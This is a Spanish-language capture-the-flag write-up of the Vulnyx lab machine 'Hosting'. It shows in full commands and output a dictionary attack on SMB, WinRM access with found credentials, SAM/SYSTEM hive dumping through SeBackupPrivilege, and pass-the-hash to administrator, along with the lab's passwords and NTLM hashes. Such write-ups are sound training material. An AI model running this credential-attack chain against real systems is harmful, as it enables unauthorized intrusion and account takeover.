Table of Contents
Vulnyx: Hosting Writeup
Welcome to my detailed writeup of the easy difficulty machine “Hosting” on Vulnyx. This writeup will cover the steps taken to achieve initial foothold and escalation to root.
TCP Enumeration
1rustscan -a $TARGET --ulimit 5000 -g
2192.168.2.10 -> [80,135,139,445,5040,5985,7680,47001,49664,49665,49666,49667,49668,49669,49670]
1nmap -p80,135,139,445,5040,5985,7680,47001,49664,49665,49666,49667,49668,49669,49670 -sCV $TARGET -oN allPorts
2Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-02 18:06 CET
3Nmap scan report for 192.168.2.10
4Host is up (0.00051s latency).
5
6PORT STATE SERVICE VERSION
780/tcp open http Microsoft IIS httpd 10.0
8|_http-server-header: Microsoft-IIS/10.0
9| http-methods:
10|_ Potentially risky methods: TRACE
11|_http-title: IIS Windows
12135/tcp open msrpc Microsoft Windows RPC
13139/tcp open netbios-ssn Microsoft Windows netbios-ssn
14445/tcp open microsoft-ds?
155040/tcp open unknown
165985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
17|_http-title: Not Found
18|_http-server-header: Microsoft-HTTPAPI/2.0
197680/tcp open pando-pub?
2047001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
21|_http-server-header: Microsoft-HTTPAPI/2.0
22|_http-title: Not Found
2349664/tcp open msrpc Microsoft Windows RPC
2449665/tcp open msrpc Microsoft Windows RPC
2549666/tcp open msrpc Microsoft Windows RPC
2649667/tcp open msrpc Microsoft Windows RPC
2749668/tcp open msrpc Microsoft Windows RPC
2849669/tcp open msrpc Microsoft Windows RPC
2949670/tcp open msrpc Microsoft Windows RPC
30Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
31
32Host script results:
33|_clock-skew: -1h00m01s
34| smb2-security-mode:
35| 3:1:1:
36|_ Message signing enabled but not required
37|_nbstat: NetBIOS name: HOSTING, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:f9:55:fd (Oracle VirtualBox virtual NIC)
38| smb2-time:
39| date: 2025-01-02T16:09:15
40|_ start_date: N/A
41
42Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
43Nmap done: 1 IP address (1 host up) scanned in 172.18 seconds
UDP Enumeration
1sudo nmap --top-ports 1500 -sU --min-rate 5000 -n -Pn 192.168.2.10 -oN allPorts.UDP
2[sudo] password for kali:
3Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-02 18:05 CET
4Nmap scan report for 192.168.2.10
5Host is up (0.00024s latency).
6Not shown: 1498 open|filtered udp ports (no-response)
7PORT STATE SERVICE
8137/udp open netbios-ns
941370/udp closed unknown
10MAC Address: 08:00:27:F9:55:FD (Oracle VirtualBox virtual NIC)
11
12Nmap done: 1 IP address (1 host up) scanned in 0.86 seconds
Del escaneo inicial podemos sacar algunas conclusiones, existe un servicio web, en máquinas Windows no es muy común (depende de la dificultad) ver servicios web, así que es interesante.
Vemos que no se está utilizando Kerberos, por lo cual nos olvidamos de entornos de directorio activo.
Vemos que está expuesto el puerto 5985/TCP que corresponde al protocolo WinRM, por lo cual si tenemos las credenciales de algún usuario que pertenezca al grupo Remote Management Users podríamos ganar una consola interactiva utilizando evil-winrm
Y además vemos el nombre de NetBIOS hosting, lo vamos a añadir al /etc/hosts solo por comodidad ya que no es necesario.
SMB Enumeration (unauthenticated)
No podemos enumerar el servicio SMB con una NULL SESSION.
1➜ scan smbmap -H 192.168.2.10 -u '' -p ''
2
3 ________ ___ ___ _______ ___ ___ __ _______
4 /" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
5 (: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
6 \___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
7 __/ \ |: \. |(| _ \ |: \. | // __' \ (| /
8 /" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
9 (_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
10 -----------------------------------------------------------------------------
11 SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
12 https://github.com/ShawnDEvans/smbmap
13
14[*] Detected 1 hosts serving SMB
15[*] Established 0 SMB session(s)
16➜ scan smbmap -H 192.168.2.10 -u '' -p ''
17➜ scan smbclient -L 192.168.2.10 -U '' -N
18session setup failed: NT_STATUS_ACCESS_DENIED
HTTP Enumeration
whatweb no nos reporta nada interesante del servicio web.
1whatweb http://192.168.2.10
2http://192.168.2.10 [200 OK] Country[RESERVED][ZZ], HTTPServer[Microsoft-IIS/10.0], IP[192.168.2.10], Microsoft-IIS[10.0], Title[IIS Windows]
La raíz del sitio web es la página por defecto de los servidores IIS.
Fuzzeando con feroxbuster encontramos un recurso /speed
1feroxbuster -u http://192.168.2.10/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -d 1 -t 100
2
3 ___ ___ __ __ __ __ __ ___
4|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
5| |___ | \ | \ | \__, \__/ / \ | |__/ |___
6by Ben "epi" Risher 🤓 ver: 2.10.3
7───────────────────────────┬──────────────────────
8 🎯 Target Url │ http://192.168.2.10/
9 🚀 Threads │ 100
10 📖 Wordlist │ /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
11 👌 Status Codes │ All Status Codes!
12 💥 Timeout (secs) │ 7
13 🦡 User-Agent │ feroxbuster/2.10.3
14 💉 Config File │ /etc/feroxbuster/ferox-config.toml
15 🔎 Extract Links │ true
16 🏁 HTTP methods │ [GET]
17 🔃 Recursion Depth │ 1
18 🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
19───────────────────────────┴──────────────────────
20 🏁 Press [ENTER] to use the Scan Management Menu™
21──────────────────────────────────────────────────
22404 GET 29l 94w 1251c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
23200 GET 359l 2112w 178556c http://192.168.2.10/iisstart.png
24200 GET 32l 54w 696c http://192.168.2.10/
25301 GET 2l 10w 160c http://192.168.2.10/speed => http://192.168.2.10/speed/
Aquí vemos algo mas de contenido, aunque todo es muy estático.
En un apartado del sitio web encontramos algunos usuarios y un dominio hosting.nyx, lo vamos a añadir al /etc/hosts y vamos a hacer una lista de usuarios con los que acabamos de encontrar.
Esta es la lista de usuarios.
1cat -p users.txt
2p.smith
3a.krist
4m.faeny
5k.lendy
Si se utilizase kerberos podríamos comprobar que usuarios son válidos a nivel de dominio, pero bueno…
SMB Bruteforce
Fuzzeando por subdominios y por extensiones de ficheros no encontré nada, así que podemos probar la fuerza bruta (o ataques por diccionario).
Podemos hacer esto con netexec, primero vamos a probar la propia lista de usuario como contraseña y no conseguimos nada.
1nxc smb 192.168.2.10 -u users.txt -p users.txt
2SMB 192.168.2.10 445 HOSTING [*] Windows 10 / Server 2019 Build 19041 x64 (name:HOSTING) (domain:HOSTING) (signing:False) (SMBv1:False)
3SMB 192.168.2.10 445 HOSTING [-] HOSTING\p.smith:p.smith STATUS_LOGON_FAILURE
4SMB 192.168.2.10 445 HOSTING [-] HOSTING\a.krist:p.smith STATUS_LOGON_FAILURE
5SMB 192.168.2.10 445 HOSTING [-] HOSTING\m.faeny:p.smith STATUS_LOGON_FAILURE
6SMB 192.168.2.10 445 HOSTING [-] HOSTING\k.lendy:p.smith STATUS_LOGON_FAILURE
7SMB 192.168.2.10 445 HOSTING [-] HOSTING\p.smith:a.krist STATUS_LOGON_FAILURE
8SMB 192.168.2.10 445 HOSTING [-] HOSTING\a.krist:a.krist STATUS_LOGON_FAILURE
9SMB 192.168.2.10 445 HOSTING [-] HOSTING\m.faeny:a.krist STATUS_LOGON_FAILURE
10SMB 192.168.2.10 445 HOSTING [-] HOSTING\k.lendy:a.krist STATUS_LOGON_FAILURE
11SMB 192.168.2.10 445 HOSTING [-] HOSTING\p.smith:m.faeny STATUS_LOGON_FAILURE
12SMB 192.168.2.10 445 HOSTING [-] HOSTING\a.krist:m.faeny STATUS_LOGON_FAILURE
13SMB 192.168.2.10 445 HOSTING [-] HOSTING\m.faeny:m.faeny STATUS_LOGON_FAILURE
14SMB 192.168.2.10 445 HOSTING [-] HOSTING\k.lendy:m.faeny STATUS_LOGON_FAILURE
15SMB 192.168.2.10 445 HOSTING [-] HOSTING\p.smith:k.lendy STATUS_LOGON_FAILURE
16SMB 192.168.2.10 445 HOSTING [-] HOSTING\a.krist:k.lendy STATUS_LOGON_FAILURE
17SMB 192.168.2.10 445 HOSTING [-] HOSTING\m.faeny:k.lendy STATUS_LOGON_FAILURE
18SMB 192.168.2.10 445 HOSTING [-] HOSTING\k.lendy:k.lendy STATUS_LOGON_FAILURE
A la desesperada probé la lista de rockyou.txt y tuve suerte.
1nxc smb 192.168.2.10 -u users.txt -p /usr/share/wordlists/rockyou.txt --ignore-pw-decoding
2SMB 192.168.2.10 445 HOSTING [-] HOSTING\p.smith:booboo STATUS_LOGON_FAILURE
3SMB 192.168.2.10 445 HOSTING [-] HOSTING\a.krist:booboo STATUS_LOGON_FAILURE
4SMB 192.168.2.10 445 HOSTING [-] HOSTING\m.faeny:booboo STATUS_LOGON_FAILURE
5SMB 192.168.2.10 445 HOSTING [-] HOSTING\k.lendy:booboo STATUS_LOGON_FAILURE
6SMB 192.168.2.10 445 HOSTING [+] HOSTING\p.smith:kissme
Teniendo este combo, podemos listar los recursos compartidos a nivel de red pero no vemos nada.
1nxc smb 192.168.2.10 -u p.smith -p kissme --shares
2SMB 192.168.2.10 445 HOSTING [*] Windows 10 / Server 2019 Build 19041 x64 (name:HOSTING) (domain:HOSTING) (signing:False) (SMBv1:False)
3SMB 192.168.2.10 445 HOSTING [+] HOSTING\p.smith:kissme
4SMB 192.168.2.10 445 HOSTING [*] Enumerated shares
5SMB 192.168.2.10 445 HOSTING Share Permissions Remark
6SMB 192.168.2.10 445 HOSTING ----- ----------- ------
7SMB 192.168.2.10 445 HOSTING ADMIN$ Admin remota
8SMB 192.168.2.10 445 HOSTING C$ Recurso predeterminado
9SMB 192.168.2.10 445 HOSTING IPC$ READ IPC remota
Enumerando los usuarios vemos algo extraño, en el usuario m.davis vemos una descripción que tiene pinta de ser una credencial.
1nxc smb 192.168.2.10 -u p.smith -p kissme --users
2SMB 192.168.2.10 445 HOSTING [*] Windows 10 / Server 2019 Build 19041 x64 (name:HOSTING) (domain:HOSTING) (signing:False) (SMBv1:False)
3SMB 192.168.2.10 445 HOSTING [+] HOSTING\p.smith:kissme
4SMB 192.168.2.10 445 HOSTING [*] Enumerated 9 local users: HOSTING
5SMB 192.168.2.10 445 HOSTING -Username- -Last PW Set- -BadPW- -Description-
6SMB 192.168.2.10 445 HOSTING Administrador 2024-09-02 16:24:30 0
7SMB 192.168.2.10 445 HOSTING administrator 2024-09-02 17:17:47 0
8SMB 192.168.2.10 445 HOSTING DefaultAccount 2024-09-02 16:24:40 0
9SMB 192.168.2.10 445 HOSTING f.miller 2024-09-02 16:28:55 0
10SMB 192.168.2.10 445 HOSTING Invitado 2024-09-02 16:24:48 0
11SMB 192.168.2.10 445 HOSTING j.wilson 2024-09-02 16:31:36 0
12SMB 192.168.2.10 445 HOSTING m.davis 2024-09-02 16:29:54 0 H0$T1nG123!
13SMB 192.168.2.10 445 HOSTING p.smith 2024-09-02 16:18:30 0
14SMB 192.168.2.10 445 HOSTING WDAGUtilityAccount <never> 0
Y vemos que esta credencial es válida para j.wilson
1nxc smb 192.168.2.10 -u users.txt -p 'H0$T1nG123!' --continue-on-success
2SMB 192.168.2.10 445 HOSTING [*] Windows 10 / Server 2019 Build 19041 x64 (name:HOSTING) (domain:HOSTING) (signing:False) (SMBv1:False)
3SMB 192.168.2.10 445 HOSTING [-] HOSTING\p.smith:H0$T1nG123! STATUS_LOGON_FAILURE
4SMB 192.168.2.10 445 HOSTING [-] HOSTING\a.krist:H0$T1nG123! STATUS_LOGON_FAILURE
5SMB 192.168.2.10 445 HOSTING [-] HOSTING\m.faeny:H0$T1nG123! STATUS_LOGON_FAILURE
6SMB 192.168.2.10 445 HOSTING [-] HOSTING\k.lendy:H0$T1nG123! STATUS_LOGON_FAILURE
7SMB 192.168.2.10 445 HOSTING [-] HOSTING\f.miller:H0$T1nG123! STATUS_LOGON_FAILURE
8SMB 192.168.2.10 445 HOSTING [+] HOSTING\j.wilson:H0$T1nG123!
9SMB 192.168.2.10 445 HOSTING [-] HOSTING\m.davis:H0$T1nG123! STATUS_LOGON_FAILURE
Abusing WinRM -> Foothold
Podemos comprobar que este usuario pertenece al grupo de Remote Management Users ya que netexec nos reporta Pwn3d! al comprobar esta credencial en WinRM
1nxc winrm 192.168.2.10 -u j.wilson -p 'H0$T1nG123!'
2WINRM 192.168.2.10 5985 HOSTING [*] Windows 10 / Server 2019 Build 19041 (name:HOSTING) (domain:HOSTING)
3WINRM 192.168.2.10 5985 HOSTING [+] HOSTING\j.wilson:H0$T1nG123! (Pwn3d!)
Así que con evil-winrm podemos conseguir una consola como j.wilson
1evil-winrm -i 192.168.2.10 -u j.wilson -p 'H0$T1nG123!'
2
3Evil-WinRM shell v3.5
4
5Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
6
7Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
8
9Info: Establishing connection to remote endpoint
10*Evil-WinRM* PS C:\Users\j.wilson\Documents> whoami
11hosting\j.wilson
Podemos ver la flag de usuario.
1*Evil-WinRM* PS C:\Users\j.wilson\Desktop> type user.txt
250e5add3f5cb064...
Privilege Escalation
Vemos que este usuario pertenece al grupo Backup Operators
1*Evil-WinRM* PS C:\Users\j.wilson\Desktop> whoami /groups
2
3INFORMACIàN DE GRUPO
4--------------------
5
6Nombre de grupo Tipo SID Atributos
7=========================================== ============== ============ ========================================================================
8Todos Grupo conocido S-1-1-0 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
9BUILTIN\Operadores de copia de seguridad Alias S-1-5-32-551 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
10BUILTIN\Usuarios Alias S-1-5-32-545 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
11BUILTIN\Usuarios de administraci¢n remota Alias S-1-5-32-580 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
12NT AUTHORITY\NETWORK Grupo conocido S-1-5-2 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
13NT AUTHORITY\Usuarios autentificados Grupo conocido S-1-5-11 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
14NT AUTHORITY\Esta compa¤¡a Grupo conocido S-1-5-15 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
15NT AUTHORITY\Cuenta local Grupo conocido S-1-5-113 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
16NT AUTHORITY\Autenticaci¢n NTLM Grupo conocido S-1-5-64-10 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
17Etiqueta obligatoria\Nivel obligatorio alto Etiqueta S-1-16-12288
Abusing SeBackupPrivilege
Esto es interesante ya que a los usuarios de este grupo se le asigna el privilegio SeBackupPrivilege
1*Evil-WinRM* PS C:\Users\j.wilson\Desktop> whoami /priv
2
3INFORMACIàN DE PRIVILEGIOS
4--------------------------
5
6Nombre de privilegio Descripci¢n Estado
7============================= =================================================== ==========
8SeBackupPrivilege Hacer copias de seguridad de archivos y directorios Habilitada
9SeRestorePrivilege Restaurar archivos y directorios Habilitada
10SeShutdownPrivilege Apagar el sistema Habilitada
11SeChangeNotifyPrivilege Omitir comprobaci¢n de recorrido Habilitada
12SeUndockPrivilege Quitar equipo de la estaci¢n de acoplamiento Habilitada
13SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Habilitada
14SeTimeZonePrivilege Cambiar la zona horaria Habilitada
El privilegio SeBackupPrivilege en Windows otorga a un usuario o proceso la capacidad de acceder a archivos y directorios, ignorando las configuraciones de seguridad aplicadas a esos objetos. Este permiso suele ser utilizado por programas de respaldo o procesos que necesitan copiar o respaldar archivos a los que normalmente el usuario no tendría acceso.
No obstante, si este privilegio no se gestiona adecuadamente o se concede a usuarios o procesos no autorizados, puede convertirse en una vulnerabilidad de escalada de privilegios. Los actores malintencionados podrían explotar esta debilidad para obtener acceso no autorizado a archivos y datos sensibles del sistema.
En la máquina DC02 de HackMyVM explotamos este privilegio pero de una forma remota, en este caso tenemos una consola en la máquina víctima por lo cual es mucho mas fácil escalar privilegios.
Primero me voy a crear un directorio para trabajar comodamente.
1*Evil-WinRM* PS C:\windows\temp\work> pwd
2
3Path
4----
5C:\windows\temp\work
Ahora simplemente podemos hacer una copia del archivo SAM que recordemos que contiene todos los usuarios y sus hashes NTLM en entornos de WORKSTATION y podemos copiar el registro system que es el que contiene la clave de encriptado del archivo SAM.
1*Evil-WinRM* PS C:\windows\temp\work> reg save hklm\sam sam.hive
2La operaci¢n se complet¢ correctamente.
3
4*Evil-WinRM* PS C:\windows\temp\work> reg save hklm\system system.hive
5La operaci¢n se complet¢ correctamente.
6
7*Evil-WinRM* PS C:\windows\temp\work> dir
8
9
10 Directorio: C:\windows\temp\work
11
12
13Mode LastWriteTime Length Name
14---- ------------- ------ ----
15-a---- 1/2/2025 5:27 PM 57344 sam.hive
16-a---- 1/2/2025 5:27 PM 11988992 system.hive
Ahora con la función download interna de evil-winrm vamos a descargarnos estos archivos.
1*Evil-WinRM* PS C:\windows\temp\work> download sam.hive
2
3Info: Downloading C:\windows\temp\work\sam.hive to sam.hive
4
5Info: Download successful!
6*Evil-WinRM* PS C:\windows\temp\work> download system.hive
7
8Info: Downloading C:\windows\temp\work\system.hive to system.hive
9
10Info: Download successful!
Ahora podemos con impacket-secretsdump para dumpear el archivo SAM y obtener los hashes NTLM de los usuarios del sistema.
1impacket-secretsdump -sam sam.hive -system system.hive LOCAL
2Impacket v0.12.0.dev1+20240711.104209.512a1db5 - Copyright 2023 Fortra
3
4[*] Target system bootKey: 0x827cc782adafc2fd1b7b7a48da1e20ba
5[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
6Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
7Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
8DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
9WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:8afe1e889d0977f8571b3dc0524648aa:::
10administrator:1002:aad3b435b51404eeaad3b435b51404ee:41186fb28e283ff758bb3dbeb6fb4a5c:::
11p.smith:1003:aad3b435b51404eeaad3b435b51404ee:2cf4020e126a3314482e5e87a3f39508:::
12f.miller:1004:aad3b435b51404eeaad3b435b51404ee:851699978beb72d9b0b820532f74de8d:::
13m.davis:1005:aad3b435b51404eeaad3b435b51404ee:851699978beb72d9b0b820532f74de8d:::
14j.wilson:1006:aad3b435b51404eeaad3b435b51404ee:a6cf5ad66b08624854e80a8786ad6bac:::
15[*] Cleaning up...
Pass The Hash & evil-winrm -> Privilege Escalation
Podemos hacer Pass The Hash y vemos que la cuenta Administrador se ha deshabilitado por alguna razón, quiero pensar que ha sido un acto de buena fe del creador de la máquina ya que el nombre de usuario de esta cuenta cambia dependiendo del idioma configurado en Windows, por eso también existe una cuenta llamada administrator, para hacer la máquina algo mas “universal”.
1nxc smb 192.168.2.10 -u Administrador -H '31d6cfe0d16ae931b73c59d7e0c089c0'
2SMB 192.168.2.10 445 HOSTING [*] Windows 10 / Server 2019 Build 19041 x64 (name:HOSTING) (domain:HOSTING) (signing:False) (SMBv1:False)
3SMB 192.168.2.10 445 HOSTING [-] HOSTING\Administrador:31d6cfe0d16ae931b73c59d7e0c089c0 STATUS_ACCOUNT_DISABLED
Pero podemos ver que al hacer Pass The Hash para la cuenta administrator netexec nos reporta Pwn3d! por lo cual, es una cuenta que pertenece al grupo de Administradores del Sistema.
1nxc smb 192.168.2.10 -u Administrator -H '41186fb28e283ff758bb3dbeb6fb4a5c'
2SMB 192.168.2.10 445 HOSTING [*] Windows 10 / Server 2019 Build 19041 x64 (name:HOSTING) (domain:HOSTING) (signing:False) (SMBv1:False)
3SMB 192.168.2.10 445 HOSTING [+] HOSTING\Administrator:41186fb28e283ff758bb3dbeb6fb4a5c (Pwn3d!)
Entonces podemos conseguir una consola como administrator haciendo Pass The Hash con evil-winrm
1evil-winrm -i 192.168.2.10 -u administrator -H '41186fb28e283ff758bb3dbeb6fb4a5c'
2
3Evil-WinRM shell v3.5
4
5Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
6
7Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
8
9Info: Establishing connection to remote endpoint
10*Evil-WinRM* PS C:\Users\administrator\Documents> whoami
11hosting\administrator
Podemos ver la flag de root
1*Evil-WinRM* PS C:\Users\administrator\desktop> type root.txt
29924b42399b3e0...
¡Y ya estaría!
Happy Hacking! 🚀
#Vulnyx #Controler #Writeup #Cybersecurity #Penetration Testing #CTF #Reverse Shell #Privilege Escalation #RCE #Exploit #Windows #SMB Enumeration #HTTP Enumeration #Information Disclosure #SMB Bruteforce #Dictionary Attack #Password Spraying #Abusing WinRM #Abusing SeBackupPrivilege #Abusing Backup Operators #Dumping SAM and SYSTEM Hive #Pass the Hash